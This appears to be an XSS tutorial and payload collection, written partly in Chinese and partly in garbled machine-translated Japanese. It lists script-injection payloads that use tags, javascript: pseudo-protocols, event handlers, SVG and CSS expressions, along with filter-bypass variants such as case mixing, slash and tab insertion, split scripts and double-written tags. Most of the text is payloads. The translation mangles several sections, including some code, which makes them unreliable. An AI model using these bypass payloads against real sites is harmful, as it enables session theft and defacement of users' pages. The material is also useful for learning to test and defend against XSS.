建設XSS声明
[セクション]を使用して[<>]構成HTML / JS
[II]擬似プロトコル-使用したJavaScript:擬似プロトコルはXSSが構築
[三]が独自のイベントを生成する
[IV] XSSの変形
[セクション5つのセクション]ラベルや他の技術
[VI] CSSクロスサイトでの(旧)
まず使用して、[<>]設定済みのHTML / JS
可以利用[<>] 构造HTML 标签和<script> 标签。
在测试页面提交参数[<h1 style='color:red'>
利用[<>]构造HTML/JS</h1>] 提交[<script>alert(/xss/)</script>]
セクション擬似プロトコル
可以使用javascript: 伪协议的方式构造XSS
提交参数[<a href="javascript:alert(/xss/)">touch me!</a>],然后点击超链接,即可触发XSS。
也可以使用img 标签的伪协议,但是这种方法在IE6 下测试成功。
[<img src="javascript:alert('xss')">]
セクションには、独自のイベントを発生させます
「イベント駆動型」は、より古典的なプログラミングのアイデアです。ページ上の多くのイベントが発生します(例えば、マウスの動き、キーボード入力など)は、JSはこれらの時間に対応することができます。
私たちは、イベントJSの関数、トリガーXSSによってトリガすることができますので。
イベントの種類
Windowsイベント-------------イベントウィンドウオブジェクトがトリガー
HTMLフォーム内のフォームイベントアクションを----------------トリガイベントの
キーボードイベント------------キーボード
マウス---------------ユーザーマウスまたは同様のアクションイベントによってトリガイベント
メディアイベント--------マルチメディアによってトリガ----イベント
如:[<img src='./smile.jpg' onmouseover='alert(/xss/)'>]
这个标签会引入一个图片,然后鼠标悬停在图片上的时候,
会触发XSS 代码。
单行文本框的键盘点击事件,
[<input type="text" onkeydown="alert(/xss/)">],当点击键盘任意一个按键的时候触发。
第四四半期の変形XSS
[1]ケース変換
[2]引用符を使用する
。[3] [/]スペースの
[4] ENTER
[5]タグの属性値がトランスコード
バイパス[6]ビス書き込み
我々はできますXSSコードがフィルタバイパスへの様々な修正、検出器XSSを構成します。バリアントは、以下のとおりであります
1.ケース変換
可以将payload 进行大小写转化。如下面两个例子。
<Img sRc='#' Onerror="alert(/xss/)" />
<a hREf="javaScript:alert(/xss/)">click me</a>
2.引用符の使用
引用符で使用されるHTML言語は、小文字の区別はありませんが、いくつかのフィルタ機能があり、「物質的な富。」
<img src="#" onerror="alert(/xss/)"/>
<img src='#' onerror='alert(/xss/)'/>
<img src=# onerror=alert(/xss/) />
スペース3. [/]
あなたは、スペースの代わりにスラッシュを使用することができます
<Img/sRc='#'/Onerror='alert(/xss/)' />
4.入力します。
私たちは、タブ(水平タブ)とキーワード検出バイパスにはいくつかの場所でキャリッジリターンを追加することができます。
<Img/sRc='#'/Onerror ='alert(/xss/)' />
<A hREf="javascript:alert(/xss/)">click me!</a>
トランスコードタグの属性値
あなたは、フィルタバイパスにタグ属性値をトランスコードすることができます。以下のコーディングに対応
コーディング後の簡単な方法の後。
<A hREf="javascript:alert(/xss/)">click me!</a>
<A hREf="javas	c r ipt:alert(/xss/)">
click me!
</a>
6.クロスサイトスプリット
<script>z='alert'</script>
<script>z=z+'(/xss/)'</script>
<script>eval(z)</script>
7.書き込みダブルバイパス
<script>
<scr<script>ipt>
8.幅の文字
width:expression(alert(/xss/))
9. Aコメントは、ブラウザによって無視されます
幅:exprの/ * * / ession(警報(/ X S〜S /))
10.スタイルシート[]及び[\ 0]
第5節その他のラベルと実践
他の標識には、XSSをトリガするために使用することができます。
[<svg onload="alert(/xss/)">] 这个语句还是比较简洁的。
[<input onfocus=alert(/xss/) autofocus>]
クロスサイト(旧)CSSのセクションVIのタイトル
1.インラインスタイル
[<div style="background-image:url(javascript:alert(/xss/))">]
スタイルの2.内部ページ
[<style>Body{background-image:url(javascript:alert(/xss/))}</style>]
3.外部スタイル
[<link rel="stylesheet" type="text/css" href="./xss.css"><div>hello<div>]
xss.css 文件内容如下
-------------------------------------------------- --------------- H1 {
色:赤。} {DIV
/ 幅:式(アラート(/ XSS /)) /
背景画像:URL(ジャバスクリプト:警告(/ XSS /))}
4.表現
[<div style="width:expression(alert(/xss/))">]
[<style>Body{background-image:expression(alert(/xss/));}</style>]
5インポート
[<style>@import 'javascript:alert("xss")';</style>]
[<style type="text/css">@import url(xss.css);</style><div>AJEST</div>]